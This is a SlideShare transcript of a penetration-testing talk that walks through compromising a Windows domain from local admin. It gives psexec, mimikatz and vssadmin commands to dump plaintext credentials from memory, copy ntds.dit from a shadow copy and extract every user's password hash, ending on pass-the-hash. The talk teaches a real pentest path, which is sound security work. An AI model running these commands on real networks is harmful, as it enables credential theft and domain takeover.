• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
Fall of a domain | From local admin to Domain user hashes
 

Fall of a domain | From local admin to Domain user hashes

on

  • 2,233 views

Author: Riyaz Walikar

Author: Riyaz Walikar

Statistics

Views

Total Views
2,233
Views on SlideShare
1,945
Embed Views
288

Actions

Likes
1
Downloads
13
Comments
0

1 Embed 288

http://null.co.in 288

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    Fall of a domain | From local admin to Domain user hashes Fall of a domain | From local admin to Domain user hashes Presentation Transcript

    • The Fall of a Domain LOCAL ADMIN TO DOMAIN USER HASHES Riyaz Walikar
    • Disclaimer  It was far more painstaking and complicated than this!  Demo setup to show execution path  All the commands were actually used in the pentest  Please do not try this on your office/corporate environment without written permission
    • Please exercise caution!
    • The story so far  Remote RDP access to a machine on the client network via VPN  Local Administrator rights to simulate an employee  User is a limited domain user  Domain controller on the same network, reachable with LDAP services running
    • Visually. This.
    • Local Admin eh?  Locally logged in as TARDISfwhite  Domain limited user but local admin  Other users connected? [Task Manager > Users]  Found another user connected to our system via RDP –sweet! (possibly domain admin )  Need system privs! Any ideas?
    • Think Sysinternals!  psexec –s –i cmd.exe
    • Dump connected user credentials  mimikatz – Benjamin Delpy  Extracts plaintext passwords from memory  Wdigest, tspkg, kerberos and many more  mimikatz  privilege::debug  token::elevate  sekurlsa::logonPasswords
    • Windows (In)Security?
    • Now what? http://gapingvoid.com/2008/06/13/now-what/
    • Remote CMD anyone?  RDP directly!  Lets be discreet   psexec -s –u TARDISatomboy 10.10.10.1 cmd.exe  Game already over!  Instead RDP with user credentials and present report
    • Lets grab some hashes   Active Directory stores user information in %systemroot%ntdsntds.dit  Locked during system usage  ntdsutil + snapshot = backup (> Windows 2008)  vssadmin create shadow /for=C: (> Windows 2003)
    • Lets grab some hashes   backup readable by nt authoritysystem and administrators  We need the ntds.dit and SYSTEM files  cd / dir /other inbuilt cmd commands do not work on unmounted volume shadow copies  copy works!
    • Core files needed
    • NTDS.dit structure parse?  NTDSXtract - A framework for offline forensic analysis of ntds.dit  Need the libesedb module as well  libesedb and creddump in ntds_dump_hashes.zip  wget to a linux box (Kali is a good choice)
    • get framework + compile + make + run  wget http://ntdsxtract.com/downloads/ntdsxtract/ntdsxt ract_v1_0.zip  wget http://ntdsxtract.com/downloads/ntds_dump_hash .zip  unzip both
    • get framework + compile + make + run  cd ntds_dump_hash/libesedb  ./configure && make  cd libesedb/esedbtools  ./esedbexport -l /tmp/ntds.log <ntds.dit>
    • Yay!  python ../../ntdsxtract/dsusers.py datatable link_table --passwordhashes <system_file> – passwordhistory <system_file>  Cleanup the output with ntdstopwdump.py (https://raw.github.com/inquisb/miscellaneous/mas ter/ntdstopwdump.py)
    • Now what? http://gapingvoid.com/2008/06/13/now-what/
    • Pass the hash / Password Cracking!  Use the Windows Credentials Editor – Amplia Security  Password Cracking >> Humla perhaps 
    • References  http://blog.gentilkiwi.com/mimikatz  http://www.ampliasecurity.com/research/wcefaq.ht ml  http://bernardodamele.blogspot.in/2011/12/dumpwindows-password-hashes_16.html
    • Thank you riyazwalikar@gmail.com http://www.riyazwalikar.com